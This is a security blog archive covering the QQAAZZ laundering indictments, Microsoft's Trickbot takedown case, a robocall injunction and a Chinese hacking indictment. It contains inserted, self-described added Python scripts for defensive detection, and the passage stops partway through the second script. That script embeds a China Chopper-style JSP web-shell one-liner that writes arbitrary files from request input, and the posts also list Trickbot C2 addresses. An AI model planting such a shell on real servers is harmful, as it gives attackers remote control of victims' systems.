Friday, October 16, 2020

Trickbot on the Ropes Part 2: The QQAAZZ Money Laundering Ring

While shutting down the technical aspects of malware is critical (see Trickbot on the Ropes Part 1), the real disincentive to the criminals is when you hit them hard in the money.  That was the objective of Europol's Operation 2BaGoldMule case against QQAAZZ.  Working with partners in 16 countries, including Latvia, Bulgaria, the United Kingdom, Spain, and Italy, Europol helped to coordinate search warrants executed at 40 different residences in support of criminal proceedings in the United States, Portugal, the UK, and Spain.

Europol put out a two-part infographic as part of their story on the arrests, "20 Arrests in QQAAZZ Multi-Million Money Laundering Case":



The criminals behind the QQAAZZ money laundering ring received funds from botnet operators, and "tumbled" the funds through a variety of shell companies and crypto-currencies to produce "clean money" keeping a 40% to 50% cut of the funds for themselves.

The U.S. Department of Justice says that QQAAZZ-controlled bank accounts received funds stolen via banking trojans including Dridex, Trickbot, and GozNym.  The DOJ action came in two rounds; the first indictment, unsealed back in October 2019, named these individuals: 

Aleksejs Trofimovics
a/k/a Aleksejs Trofimovich, Alexey Trofimovich, Aleko Stoyanov Angelov 
Ruslans Nikitenko 
a/k/a Krzysztof Wojciech Lewko, Milen Nikolchev Nikolov, Rafal Zimnoch 
Arturs Zaharevics
a/k/a Piotr Ginelli, Arkadiusz Szuberski 
Deniss Ruseckis
a/k/a Denis Rusetsky, Sevdelin Sevdalinov Atanasov 

These individuals used a collection of shell companies to open a large number of bank accounts in Portugal.  In 2018, I sat in a meeting in London with a handful of the largest banks in the UK and heard for the first time as they shared information with one another that it was a "common" thing that when someone had their bank account hit by Trickbot, a wire transfer would be sent to Portugal!

According to the indictment, Ruslans Nikitenko used his shell company Selbevulte LDA to open accounts at eleven banks in Portugal.  He used the company Colossal Devotion LDA to open accounts at nine additional banks.  Arturs Zaharevics created the shell company Cardinal Gradual Real Estate Unipessoal LDA and used it to open accounts at ten banks in Portugal.  Deniss Ruseckis created Flamingocloud LDA and used it to open accounts at thirteen banks in Portugal!

According to the October 2019 indictment, the transactions shown below alone account for more than $1.1 million USD in attempted wires, although in more than half of the cases the funds were blocked or recovered.

Date        Victim Bank        Wire Attempt   Beneficiary
07MAR2017   Schwab             $75,000        Aktrofi Services
20SEP2017   BOA                $84,900        Aktrofi Services
26OCT2017   JPMorgan Chase     $98,780        Privelegioasis
29NOV2017   American Express   $121,360       Selbevulte
30NOV2017   BB&T               $72,000        Privelegioasis
08MAR2018   USAA               $29,500        Flamingocloud
08MAR2018   USAA               $29,500        Colossal Devotion
21MAR2018   BOA                $49,000        Colossal Devotion
10APR2018   JPMorgan Chase     $59,426        Cardinal Gradual
10APR2018   JPMorgan Chase     $59,426        Cardinal Gradual
10APR2018   JPMorgan Chase     $59,426        Cardinal Gradual
30AUG2018   PNC                $99,693        Selbevulte
14NOV2018   BOA                $56,202        Aktrofi Services
14NOV2018   BOA                $112,921       Deinis Gorenko
14NOV2018   BOA                $45,830        Deinis Gorenko
06DEC2018   JPMorgan Chase     $114,652       Flamingocloud

In between that indictment and the current one, there was a bit more publicity in May 2020 when "Plinofficial", a Russian scam-rapper whose real name is Maksim Boiko, was arrested by the FBI when he landed at the Miami airport, as covered by the BBC and others at the time. 

In the more recent action, an indictment filed in the U.S. District Court for the Western District of Pennsylvania on 29SEP2020 has just been unsealed.  It names an additional group of money launderers:

  • Nika Nazarovi - of Georgia - aka Nika Utiashvili, Mihail Atanasov, Stefan Trifonov Zhelyazkov
  • Martins Ignatjevs - of Latvia - aka Yodan Angelov Stoyanov, Aleksander Tihomirov Yanev, Svetlin Iliyanov Asenov 
  • Aleksandre Kobiashvili - of Georgia - aka Antonios Nastas, Ognyan Krasimirov Trifonov
  • Dmitrijs Kuzminovs - of Latvia - aka Parush Gospodinov
  • Valentins Sevecs - of Latvia - aka Marek Jaswilko, Rafal Szczytko
  • Dmitrijs Slapins - of Latvia 
  • Armens Vecels - of Latvia 
  • Artiom Capacli - of Bulgaria
  • Ion Cebanu  - of Romania
  • Tomass Trescinkas - of Latvia 
  • Ruslans Sarapovs - of Latvia 
  • Silvestrs Tamenieks - of Latvia 
  • Abdelhak Hamdaoui  - of Latvia 
  • Petar Iliev - of Belgium 

The indictment says that "in total, cybercriminals attempted to transfer tens of millions of dollars to QQAAZZ-controlled accounts, and QQAAZZ successfully laundered millions of dollars stolen from victims around the world."

The indictment breaks the criminals into three tiers, including: 

  • mid-level managers 
  • money mules 

In the September 2020 indictment, some of the victim companies, whose bank accounts were used to wire money to European shell companies created by those named above, included: 

  1. a technology company in Windsor, CT 
  2. an Orthodox Jewish Synagogue in Brooklyn, NY 
  3. a medical device manufacturer in York, Pennsylvania
  4. an individual in Montclair, NJ 
  5. an architecture firm in Miami, FL 
  6. an individual in Acworth, GA
  7. an automotive parts manufacturer in Livonia, MI 
  8. a homebuilder in Skokie, IL 
  9. an individual in Carrollton, TX 
  10. an individual in Villa Park, CA.  
Dozens of additional US victims are identified, but the total number of victims whose funds were stolen, or targeted, through these schemes is unknown. 

Those named in the two indictments received funds to shell company bank accounts including at least 147 accounts opened at banks in Portugal, as well as Germany, Spain, and the United Kingdom. 

The indictment provides a partial list of the funds transfers which occurred between US-based victims and accounts controlled by these criminals. 

To attract this business, members of the QQAAZZ cash-out system advertised their services on "exclusive, underground, Russian-speaking, online cybercriminal forums."  Some of these advertisements on a single forum cost as much as $10,000 per year!  

Some of the online monikers used by QQAAZZ members in these forums included: 

qqaazz, globalqqaazz, markdevido, richrich, donaldtrump55, manuel, krakadil, kalilinux, ritchie, totala, totala22

These forum exchanges helped to establish relationships between the malware gangs and the money launderers.  For example, QQAAZZ members using the name "richrich" chatted with members of the GozNym malware crime group about being a "drop handler" in the UK and Europe and having many accounts that could be used for money laundering, including an account in the name "Yaromu Gida" at a bank in Turkey.  That account received $176,500 in funds stolen from the medical device manufacturer in the Western District of Pennsylvania. 

"DonaldTrump55" provided bank account information for a drop belonging to Ruslans Nikitenko at a bank in Portugal, opened using a counterfeit Polish identity card in the name Krzysztof Wojciech Lewko.  The account later received $121,360 from a US victim. 

Trickbot On The Ropes: Microsoft's Case Against Trickbot

Trickbot is having a truly bad time this month!  While, as of today, Trickbot binaries are being delivered by Emotet, there is every sign that they are struggling.  Emotet's daily activities are best documented by a team of researchers using the collective identity "Cryptolaemus", who share IOCs and URLs on their website.  With no Emotet activity from October 6th to 12th, there was every indication a "change" was coming, and beginning on 14OCT2020 researchers such as our friends at @CofenseLabs and @Malware_Traffic are reporting that Trickbot is now being delivered by the Emotet spam-sending botnet.  

This post examines Microsoft's case against Trickbot.  There are also reports of U.S. Cyber Command taking a role in disrupting Trickbot, as reported by the Washington Post and security journalist Brian Krebs.  In the "take-down" attempt, as described by Krebs, the bots began propagating to other bots a configuration stating that their new controller IP address should be "", which would cause the bot-infected computers to stop communicating with the criminals.  There was also an attempt to flood the criminals with millions of fake "stolen credentials," hoping to confuse their ability to sort out "true victims."  As Krebs also reported, the Feodo Tracker Trickbot C&C tracker is still reporting many live C&C addresses for Trickbot.  (Also see Trickbot On the Ropes Part 2: the QQAAZZ Money Laundering Ring.) 

The Microsoft Trickbot Case

On October 12, 2020, Microsoft announced "New action to combat ransomware ahead of U.S. election," describing Trickbot as malware that "has infected over a million computing devices around the world since late 2016."  By filing a lawsuit in the U.S. District Court for the Eastern District of Virginia, Microsoft obtained a Temporary Restraining Order (TRO).  The Digital Crimes Unit (much love, guys!) worked with the FS-ISAC, ESET, Symantec, the Microsoft Defender team, NTT, Lumen's Black Lotus Labs, and others to lay out their case. 

The legal documents surrounding the case are on the Microsoft website:

Microsoft and the FS-ISAC bring the case with a 60-page complaint, demonstrating harm to their respective customers in the Eastern District of Virginia, and demanding that "John Doe 1" and "John Doe 2" appear in court for a jury trial.

They charge them with violations of: 

  • The Copyright Act - 17 USC § 101 
  • The Computer Fraud and Abuse Act 18 USC § 1030
  • The Electronic Communications Privacy Act 18 USC § 2701
  • Trademark Infringement under the Lanham Act 15 USC § 1114
  • False Designation of Origin under the Lanham Act 15 USC § 1125(a)
  • Trademark Dilution under the Lanham Act 15 USC § 1125(c) 
  • Common Law Trespasses to Chattels 
  • Unjust Enrichment 
  • and Conversion 
To disable the infrastructure, Microsoft asked the court to order hosting providers to suspend service to, and to block and monitor traffic for, the customers using particular IP addresses within their networks.  The list included: 

  • Input Output Flood, LLC of Las Vegas, for IP addresses: 
    • 104.161.32[.]103, .105, .106, .109, and .118.
  • Hosting Solution Ltd (Hurricane Electric of Fremont, California) for IP address:
    •  104.193.252[.]221.
  • Nodes Direct Holdings of Jacksonville Florida for IP addresses: 
    • 107.155.137[.]7, .19, and .28,
    • 162.216.0[.]163, 
    • 23.239.84[.]132, .136
  • Virtual Machine Solutions, LLC of Los Angeles, California for IP addresses: 
    • 107.174.192[.]162 and 
    • 107.175.184[.]201
  • Hostkey USA of New York for IP address: 
    • 139.60.163[.]45 
  • Fastlink Network Inc, of Los Angeles for IP address: 
    • 156.96.46[.]27
  • Green Floid LLC for IP addresses: 
    • 195.123.241[.]13 and .55 
  • Twinservers Hosting of Nashua, New Hampshire for IP address: 
    • 162.247.155[.]165  

Each team made significant contributions to the effort, and most have published their own Trickbot blogs, which I link below.  With regard to the case, their most important function was to provide professional analysis in the form of a Declaration in Support of the Motion for TRO: 

  • Lyons is Jason Lyons, a Senior Manager of Investigations on the DCU Malware & Cloud Crimes Team.  Lyons, who served in the Cyber Counterintelligence unit of the U.S. Army, provides 25 pages of testimony and ten "Exhibits."  Part of his testimony includes evidence of 25 million Gmail, 19 million Yahoo, 11 million Hotmail, 7 million AOL, 3.5 million MSN, and 2 million addresses known to have been targeted by Trickbot (based on reporting from Deep Instinct).
  • Finones is Rodelio Finones, a Senior Security Software Engineer and Malware Researcher at the Microsoft DCU.  He provides 21 pages of testimony on his own investigation into Trickbot.
  • Thakur is Vikram Thakur, Technical Director at Symantec Enterprise, where he has been a major rockstar for more than a dozen years!  He provides 20 pages of testimony.
  • Garlow is Kevin Garlow, Lead Information Security Engineer at Lumen (formerly CenturyLink).  His testimony includes the fact that he has identified 502 distinct IP addresses that have acted as Trickbot controllers, that 40 of them remained online despite more than 30 abuse notifications, and that 9 of them have been sent more than 100 such notifications.  He states that "We confirmed 55 new Trickbot controller IPs in September 2020 and 99 new Trickbot controller IPs in August."  It is these long-lived "bullet-proof" controllers that Microsoft is targeting, and it is likely that revealing whoever pays the bills for those long-lived services is a path to identifying John Doe 1 and John Doe 2.  Garlow's testimony that so many take-down notices have been ignored is a powerful part of this package!
  • Silberstein is Steven Silberstein, the CEO of the FS-ISAC.  He testifies to more than 500 fraud attempts against FS-ISAC member institutions over an 18-month period, with $7 million in attempted fraud.  One FS-ISAC member had dozens of attempts in a two-week period with an average fraud attempt of $268,000!  
  • Ghaffari is Kayvan M. Ghaffari, an attorney with Crowell & Moring LLP representing Microsoft and the FS-ISAC.  His testimony calls out the particular web hosting companies that were hosting the machines targeted by the TRO, including Colocrossing, IOFlood, HostKey, VDI-Network, ENET-2, and King Servers, pointing out that all of these organizations have Terms of Service which are clearly violated by the Trickbot controllers.  He then attaches as exhibits more than 650 pages of similar cases and the related court documents from them.
  • Boutin is Jean-Ian Boutin, Head of Threat Research at ESET, who calls Trickbot "one of the most prolific and frequently encountered types of malware on the Internet."

Related TrickBot Blogs

ESET analyzed 125,000 malware samples and downloaded and decrypted 40,000 configuration files used by Trickbot modules, helping to map out the C&C servers used by the botnet.  While Trickbot can drop many "modules," these are not one-size-fits-all.  Modules were sometimes dropped in phases after an initial assessment of the network on which the bot found itself, and at other times the selection varied by the "gtag" -- the unique campaign label embedded in each infection, thought to correspond to the affiliates who paid the Trickbot operators.

gtag timeline by ESET

Lumen's Black Lotus Labs provided C2 timelines, showing which IP addresses in which countries were active in which timeframes.  Indonesia, for example, hosted active C2 servers on 1,362 days!  Colombia and Ecuador, #2 and #3 by their count, had only 652 and 637 C2-days by comparison.  They shared 95 C2 addresses in their recent "Look Inside the Trickbot Botnet" blog post.  Many of these IP addresses are also called out in Lyons's testimony as Exhibit 2.


Symantec's blog post "Trickbot: U.S. Court Order Hits Botnet's Infrastructure" has a great infographic about "How Trickbot Works": 

Microsoft on Trickbot's use of Covid-19 Lures

Microsoft is in a unique position to take action against malware, having visibility to so much malware-related traffic from browser telemetry, Microsoft Defender reports, and Office365 scans.  In the past year, they have evaluated 6 Trillion messages and blocked 13 Billion malicious emails that used 1.6 Billion URLs to try to infect the email recipients!

Microsoft's Digital Defense Report 2020 points out that Trickbot began using COVID-19 spam lures on March 3, 2020, and went on to become the most prominent spam botnet using COVID-19 themes.

From MS Digital Defense Report 2020 

We've long argued that if the lure is timely and controversial, people will click on it.  That seems to be the case even today, as Proofpoint's @ThreatInsight has pointed out, documenting that a recent malware campaign, first seen October 6, 2020, is using President Trump's diagnosis as a lure to infect people with additional malware, using the subject line "Recent material about the president's situation" and the promise of additional details in a password-protected email attachment.

Tuesday, September 08, 2020

RoboCallers Hit with Permanent Injunction by Courts

The Eastern District of New York has ruled in the case "United States v. Nicholas Palumbo, et al.," effectively putting TollFreeDeals and SIP Retail out of business.  These are the Voice over IP (VoIP) companies that allowed millions of overseas calls per day to be routed to Americans, often for the purpose of facilitating fraud, frequently by imitating either the Social Security Administration or the IRS.  The case, originally filed 28JAN2020 (1:2020cv00473), reached its final "permanent injunction" ruling on 26AUG2020, as conveyed by the Office of the Inspector General of the Social Security Administration.  

In the 62-page complaint against the two companies, the government explains that the major fraud types facilitated by the Palumbos were: 

a. Social Security Administration ("SSA") Imposters

b. Internal Revenue Service ("IRS") Imposters 

c. United States Citizenship and Immigration Services ("USCIS") Imposters 

d. Tech Support Imposters -- often claiming to be Apple or Microsoft 

e. Loan Approval Scams

Through the use of the Palumbos' companies, the callers were able to spoof their caller ID to seem to originate from a U.S. Federal government agency, local police department, or technical support organization. 

From October 1, 2018 to September 30, 2019, the SSA received more than 465,000 complaints related to these types of calls and documented losses of more than $14 million.  The Federal Trade Commission's Consumer Sentinel database documented 166,000 such calls with losses of $37 million in calendar 2019 alone.  When all types of government impersonation calls were included, the FTC Consumer Sentinel reported 255,223 complaints causing $128 million in fraud losses in 2018 and 389,563 complaints resulting in $152 million in fraud losses in 2019!

The Social Security Calls

According to the government's complaint one such robocall, sent to millions of American telephone numbers in early 2019 used this text: 

"Hello this call is from Department of Social Security Administration the reason you have received this phone call from our department is to inform you that there is a legal enforcement actions filed on your social security number for fraudulent activities so when you get this message kindly call back at the earliest possible on our number before we begin the legal proceedings that is 619-XXX-XXXX. I repeat 619-XXX-XXXX.  Thank you."

The Technology 

How does the technology work?  The foreign call center uses Voice over IP (VoIP) to connect via broadband Internet to a U.S.-based telecommunications company called a "gateway carrier."  The gateway carrier then routes the call to a "common carrier" such as AT&T or Verizon.  Because they need to bill for these services, both the gateway carrier and the common carrier keep logs of these calls.  Part of the service provided by the gateway carrier is "least-cost routing" - basically a real-time auction of the call so that it is routed to the cheapest bidder. 

These logs provide a chain that a traceback follows backwards from the consumer who received the call: 

timestamp => destination consumer # => gateway carrier => caller-id presented (often spoofed) => downstream customer (usually the foreign call center) 

In just 23 days in May and June of 2019, TollFreeDeals transmitted more than SEVEN HUNDRED TWENTY MILLION calls!  (720,000,000 calls!!!!)  425 million of these calls lasted less than one second.  More than 24 million of these calls were placed to residents of the Eastern District of New York.

182 million of these TollFreeDeals calls originated from a single India-based VoIP carrier treated as a co-conspirator in the United States case.  One thousand source numbers accounted for 90% of these calls, and 79% of those 1,000 numbers were listed as fraudulent robocall numbers by a robocall-blocking company (YouMail).  Of those 143 million calls, 20% were Social Security imposter calls, 35% were loan-approval scams, and 14% were Microsoft refund calls.  Other calls imitated the IRS, the U.S. Treasury, and additional tech-support scams.

In May 2017, Nicholas Palumbo was notified by AT&T and others that his company was routing fraudulent government-imposter calls.  Palumbo promised to block two particular telephone numbers, but continued to allow the others.  

In February 2019, AT&T notified Palumbo that calls spoofing the USCIS and attempting to extort money had been traced to his company.  Again, Palumbo blamed his India-based VoIP carrier customer, even though this was the same company for which he had already received many warnings.  

A telecommunications industry trade association, USTelecom, provided an additional 144 notifications of fraudulent call origination to the Palumbos' companies from May 2019 to January 2020, including 83 SSA imposter fraud cases, 24 tech support imposter fraud cases, 10 IRS imposter fraud cases, and 1 USCIS impersonation fraud case.  USTelecom's notices estimated that TollFreeDeals was placing "more than 1 million fraudulent calls per day."  Palumbo logged in to the USTelecom portal and repeatedly indicated the calls had been placed by the same India-based customers of TollFreeDeals.

USTelecom also formally notified SIP Retail of similar traffic, including 35 traceback investigations from August 2019 to January 2020, including 19 SSA Impersonation cases, 3 Tech Support impersonation cases, and 1 USCIS Impersonation case.

Elder Fraud Task Force Reports

To put a human face on the crimes, a Postal Inspector working for the Elder Fraud Task Force in the Consumer Protection Branch of the Department of Justice investigated many example calls facilitated via the Palumbos' companies.

Palumbo received at least nineteen large cash deposits into Wells Fargo Bank accounts that he controlled from May 28, 2019 to September 11, 2019, totaling $130,250.  The deposits were made in Minnesota, South Carolina, Florida, Alabama, and New Jersey.  After each cash deposit, Palumbo would move the funds to his Ecommerce National LLC accounts at JP Morgan Chase.  These activities are characterized by the Postal Inspector as "Interstate Funnel Account" transactions, a form of money laundering.

Some of the victims interviewed by the Postal Inspector included: 

J.K. - an 84-year-old veteran of the U.S. Marine Corps from Belle Harbor, NY.  He received a call claiming to be from the U.S. Marshals Service with a warrant for his arrest.  He was then told by an "SSA Employee" that someone had used his SSN to rent a car in Texas and that the car was used in drug trafficking and money laundering.  The "SSA Employee" then forced J.K. to wire all of the money in his bank accounts to him - $9,800. 

C.E. - a 36-year-old man who was a brand-new U.S. citizen.  He was told by "George" from SSA that he was being investigated for money laundering.  He was told to drive to a Best Buy in Queens, NY and buy $700 worth of gift cards. 

L.U. - a man in his 40s from Roosevelt, NY, who lost $2,200 in an SSA imposter scam. 

More on Call Routing

Another affidavit in this case was the Declaration of a Special Agent of the Social Security Administration's Office of the Inspector General, who provided a diagram explaining why least-cost routing complicates tracebacks. 

From 2016 to 2020, one of the Palumbos' companies was offering VoIP termination services specializing in foreign call-center originators.  Its website specifically stated: 

"[...] is your premier connection for call center and dialer termination.  We are always looking for the best call center routes in the telecom industry.  We specialize in short call duration traffic or call center traffic.  We understand there is a need for it and we want to help you find all the channels you need!" 

They were proud of the number of call minutes they had "terminated" (meaning carried from VoIP through to call completion by a common carrier).  As of January 23, 2020, they boasted that they had helped to complete 10,491,500,323 minutes of calls!  That's TEN BILLION MINUTES of mostly fraud calls!  (Source: the Internet Archive's Wayback Machine, Jan 10, 2020.)

One of the calls documented by the SSA OIG Special Agent stated: 

"We have been forced to suspend your social security number with immediate effect.  Due to this, all your social benefits will be cancelled until further clearance. In case you feel this is due to an error you may connect with legal [unintelligible] Social Security Administration. In order to connect with a Social Security Administration office, press One now.  In case we do not hear from you, your social will be blocked permanently. To connect with an officer now, press One and you will automatically be connected with the concern departments. We did not receive any input. Dear citizen, in order to speak with Social Security personnel regarding your social security, press One and this automated system will connect you with the officials." 

This affiant establishes that those 1,000 top phone numbers identified by YouMail and confirmed as fraud based on complaints in the FTC Consumer Sentinel database came from 29 unique TollFreeDeals customers.

Many Additional Details 

There were many rounds of filings by the Palumbos' lawyers, all soundly rebutted by the Department of Justice and their investigators, often with the help of industry experts.  One in particular addresses the behavior of "Yodel": in a single day, January 20, 2020, Yodel sent more than 6.5 million robocalls through the Palumbos' services.  5.2 million of these calls used "neighbor spoofing," the practice of assigning the call a caller ID that appears to originate from someone in the same area code and with the same exchange prefix as the called party.  
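The traceback chain described under "The Technology" and the two indicators the filings lean on, sub-second calls and neighbor spoofing, can be checked mechanically once a gateway carrier's call detail records are in hand.  The script below is an added worked example, not part of the original post or of the court record: it parses constructed CDRs whose column names (timestamp, destination, gateway_carrier, caller_id, downstream_customer, duration_s) are assumptions chosen to mirror the chain above, and every telephone number, carrier and customer name in it is made up.

```python
"""Traceback and abuse-pattern checks over gateway-carrier call detail records.

Added example, not part of the original post or of the court record. The
record layout mirrors the chain the post describes (timestamp, destination
number, gateway carrier, presented caller ID, downstream customer) with one
assumed extra field, the call duration, because the filings use sub-second
calls as an indicator. Column names and all sample records are constructed.
"""
import csv
import io
from collections import defaultdict

# Constructed sample CDRs. Numbers are in E.164 form and mostly use the
# reserved 555 exchange; none belongs to a real subscriber.
SAMPLE_CDRS = """\
timestamp,destination,gateway_carrier,caller_id,downstream_customer,duration_s
2019-05-15T09:00:01Z,+17185551234,GatewayA,+17185559876,CustomerX,0.4
2019-05-15T09:00:02Z,+17185552345,GatewayA,+17185550001,CustomerX,0.2
2019-05-15T09:00:03Z,+15165553456,GatewayA,+16195550100,CustomerY,45.0
2019-05-15T09:00:04Z,+15165554567,GatewayA,+15165559999,CustomerX,0.9
2019-05-15T09:00:05Z,+12125555678,GatewayA,+12025550002,CustomerZ,120.0
2019-05-15T09:00:06Z,+12125556789,GatewayA,+12126661111,CustomerX,30.0
"""


def parse_cdrs(text):
    """Parse CSV CDR text into a list of dicts, with duration as a float."""
    rows = list(csv.DictReader(io.StringIO(text)))
    for row in rows:
        row["duration_s"] = float(row["duration_s"])
    return rows


def npa_nxx(number):
    """Split an E.164 North American number into (area code, exchange)."""
    digits = number.lstrip("+")
    if len(digits) != 11 or digits[0] != "1" or not digits.isdigit():
        raise ValueError(f"not a NANP number: {number}")
    return digits[1:4], digits[4:7]


def is_neighbor_spoofed(record):
    """True when the presented caller ID shares the destination's area code
    and exchange: the 'neighbor spoofing' pattern described in the filings."""
    return npa_nxx(record["caller_id"]) == npa_nxx(record["destination"])


def traceback(records, destination, timestamp):
    """Walk the chain backwards from a consumer complaint: given the called
    number and time, return (gateway carrier, downstream customer) or None."""
    for r in records:
        if r["destination"] == destination and r["timestamp"] == timestamp:
            return r["gateway_carrier"], r["downstream_customer"]
    return None


def summarize(records, short_threshold=1.0):
    """Per downstream customer: total calls, calls shorter than the
    threshold (seconds), and neighbor-spoofed calls."""
    stats = defaultdict(lambda: {"total": 0, "short": 0, "neighbor_spoofed": 0})
    for r in records:
        s = stats[r["downstream_customer"]]
        s["total"] += 1
        if r["duration_s"] < short_threshold:
            s["short"] += 1
        if is_neighbor_spoofed(r):
            s["neighbor_spoofed"] += 1
    return dict(stats)


def flag_customers(stats, short_ratio=0.5, spoof_ratio=0.5):
    """Return customers whose short-call or neighbor-spoof share reaches the
    given ratios. The thresholds are illustrative, not from the case."""
    flagged = []
    for customer, s in stats.items():
        if (s["short"] / s["total"] >= short_ratio
                or s["neighbor_spoofed"] / s["total"] >= spoof_ratio):
            flagged.append(customer)
    return sorted(flagged)


if __name__ == "__main__":
    recs = parse_cdrs(SAMPLE_CDRS)
    print("traceback:", traceback(recs, "+15165553456", "2019-05-15T09:00:03Z"))
    stats = summarize(recs)
    for customer, s in stats.items():
        print(customer, s)
    print("flagged:", flag_customers(stats))
```

Run as a script it prints the traceback for one constructed complaint and the per-customer counts.  A real gateway carrier would tune the ratios against its own traffic mix, but the two measures themselves are exactly what the USTelecom traceback notices and the government's complaint were built on: who sent the traffic, how much of it never connected, and how much of it wore a neighbor's number.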

Thursday, July 23, 2020

Chinese "COVID-19" Hackers indicted after 11 year hacking spree

On July 7, 2020, a Grand Jury in Seattle was presented with evidence about the eleven-year campaign of computer network intrusion conducted by two former classmates who hacked for personal profit and for the benefit of the Chinese Ministry of State Security: Li Xiaoyu (李啸宇) and Dong Jiazhi (董家志).  The pair met when they were studying Computer Application Technologies at the University of Electronic Science and Technology ("UEST") in Chengdu, China.  UEST's motto is 求实求真 大气大为 -- "To Seek Facts and Truth, To Be Noble and Ambitious."  This pair certainly "sought facts" and were "ambitious," though not in a way that many would consider "noble."  The University was admitted into Project 985 in 2001, a project that supported 34 top universities, encouraging each to become a global leader in its chosen specialty, and incidentally kicking off a new, ambitious era of global cyber espionage to help them gain competitive advantage.

Or maybe it was exactly the plan.  In 2007, likely the year that Dong would have started his college experience at UEST, the School of Software boasted that as part of the 11th Five Year Plan, their textbook, 计算机病毒技术 (Computer Virus Technology), received national acclaim.  The following year, they announced the completion of their Information Technology textbook series of 8 books, adding "Network and System Attack Technology" and "Network and System Defense Technology" to the series.  In the United States, "Network and System Attack Technology" ( 网络与系统攻击技术)  is mostly taught in the military and intelligence communities, not in undergrad computer science courses.  In 2017 the course was taught by Li Hongwei (李洪伟), whose slides are online.  In 2019 the instructors were 李洪伟 and 吴立军.
Network and System Attack Technology - Cao Yue and Yu Shengji 
An example slide from a previous version of the course, which both of our hackers would have taken (Lecture 2, "Information Retrieval"):

The text explains one of the tools from the "experimental" portion of the class, "MS06040Scanner": 

The working principle of MS06040Scanner is to first obtain the operating system type and open ports through port scanning and operating system scanning.  If it is a Windows 2000 system, TCP port 139 or TCP port 445 is open, and the returned data packet matches the definition in the vulnerability library, it means that the host may have the MS06040 vulnerability, and we can use MS06040 exploit programs to carry out remote overflow attacks on it.

The second slide demonstrates the "X-Scan" tool which would be used to find vulnerabilities allowing data exfiltration.

The Attacks 

According to the Department of Justice Indictment, Dong was the one who researched victims and means of exploiting them while Li primarily did the hacking. 


Here's how the indictment describes the "Manner and Means of the Conspiracy" -- 

"The defendants researched and identified victims possessing information of interest, including trade secrets, confidential business information, information concerning defense products and programs, and personal identifying information ("PII") of victim employees, customers, and others, using various sources of information including business news websites, consulting firm websites, and a variety of search websites.

The defendants then gained unauthorized access to victims possessing the information sought by the conspiracy.  They stole source code from software companies, information about drugs under development, including chemical designs, from pharmaceutical firms; students' PII from an education company; and weapon designs and testing data from defense contractors.

The defendants usually gained initial access to victim networks using publicly known software vulnerabilities in popular products.  Those vulnerabilities were sometimes newly announced, meaning that many users would not have installed patches to correct the vulnerability. ... They also targeted insecure default configurations in common applications."

The defendants used their initial access to place a "web shell" on the victim network, allowing remote execution of commands on the compromised server.  The most frequently deployed was the "China Chopper" web shell, which they usually hid under the file name "p.jsp" in an obscure directory on a public-facing website.  (They also sometimes named their web shells "tst.jsp", "i.jsp", or "/SQLTrace/i.jsp".)  The indictment includes a screenshot of China Chopper lifted from the FireEye blog post "Breaking down the China Chopper"; if you are interested, you should also read the Talos blog post "China Chopper still active 9 years later."

(FireEye explains China Chopper)

They would then plant tools for stealing passwords, identify computer users with Administrator access, and study the network for useful data.  The data was compressed into a .RAR archive, then often renamed with a ".jpg" extension and placed in the victim's Recycle Bin until it could be retrieved.
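Two of the artifacts just described, a tiny web shell parked under an odd name in a web root and a RAR archive renamed to .jpg in the Recycle Bin, can be hunted for with a plain file walk.  The script below is an added example, not part of the indictment and not from FireEye, Talos or any vendor tool: the directory layout and every file it scans are constructed in a temporary directory, the RAR signatures are the archive format's real magic bytes, and the web shell name list and the `request.getParameter(` substring are illustrative heuristics (the one-liner written into the sample p.jsp is modeled on the widely published China Chopper JSP form).

```python
"""Hunt for two artifacts the indictment describes: short-named JSP web shells
under a web root, and RAR archives renamed to .jpg and parked in a Recycle Bin.

Added example, not from the indictment, FireEye, Talos or any vendor tool.
The directory layout and every sample file are constructed. The RAR magic
bytes are the real archive signatures (RAR 4.x and RAR 5); the web shell
heuristics are illustrative and would need tuning against a real web root.
"""
import os
import re
import tempfile
from pathlib import Path

RAR_PREFIX = b"Rar!\x1a\x07"   # shared by RAR 4.x (..\x00) and RAR 5 (..\x01\x00)
JPEG_MAGIC = b"\xff\xd8\xff"
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}

# File names given in the indictment, plus a pattern for other very short names.
KNOWN_SHELL_NAMES = {"p.jsp", "tst.jsp", "i.jsp"}
SHORT_JSP = re.compile(r"^[a-z0-9]{1,3}\.jsp$", re.IGNORECASE)
# China Chopper's JSP variant is a one-line file that acts on a request
# parameter; this substring check is a heuristic, not a signature.
CHOPPER_HINT = b"request.getParameter("
MAX_SHELL_BYTES = 2048


def read_head(path, n=16):
    with open(path, "rb") as fh:
        return fh.read(n)


def is_disguised_archive(path):
    """An image-extension file whose first bytes carry a RAR signature."""
    p = Path(path)
    if p.suffix.lower() not in IMAGE_EXTS:
        return False
    return read_head(p).startswith(RAR_PREFIX)


def is_suspect_jsp(path):
    """A tiny .jsp with a known or very short name, or one containing the hint."""
    p = Path(path)
    if p.suffix.lower() != ".jsp" or p.stat().st_size > MAX_SHELL_BYTES:
        return False
    if p.name.lower() in KNOWN_SHELL_NAMES or SHORT_JSP.match(p.name):
        return True
    return CHOPPER_HINT in p.read_bytes()


def hunt(root):
    """Walk root and return sorted relative POSIX paths of both artifact types."""
    root = Path(root)
    found = {"disguised_archives": [], "suspect_jsp": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = Path(dirpath) / name
            rel = full.relative_to(root).as_posix()
            if is_disguised_archive(full):
                found["disguised_archives"].append(rel)
            elif is_suspect_jsp(full):
                found["suspect_jsp"].append(rel)
    for key in found:
        found[key].sort()
    return found


def build_sample_tree(base):
    """Create the constructed file layout used by run_demo()."""
    base = Path(base)
    files = {
        # benign: a large page with an ordinary name, not flagged
        "webroot/index.jsp": b"<html>" + b"x" * 4000 + b"</html>",
        # the indictment's p.jsp in an obscure directory; body modeled on the
        # published China Chopper JSP one-liner
        "webroot/images/p.jsp": (
            b'<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream('
            b'application.getRealPath("\\\\")+request.getParameter("f"))).write('
            b'request.getParameter("t").getBytes());%>'
        ),
        "webroot/SQLTrace/i.jsp": b"<% out.println(1); %>",
        # a real JPEG header, not flagged
        "users/alice/photo.jpg": JPEG_MAGIC + b"\x00" * 64,
        # staged RAR archives renamed .jpg in the Recycle Bin (RAR 4.x and RAR 5)
        "$Recycle.Bin/S-1-5-21-1000/$R12345.jpg": b"Rar!\x1a\x07\x00" + b"\x00" * 64,
        "$Recycle.Bin/S-1-5-21-1000/$R67890.jpg": b"Rar!\x1a\x07\x01\x00" + b"\x00" * 64,
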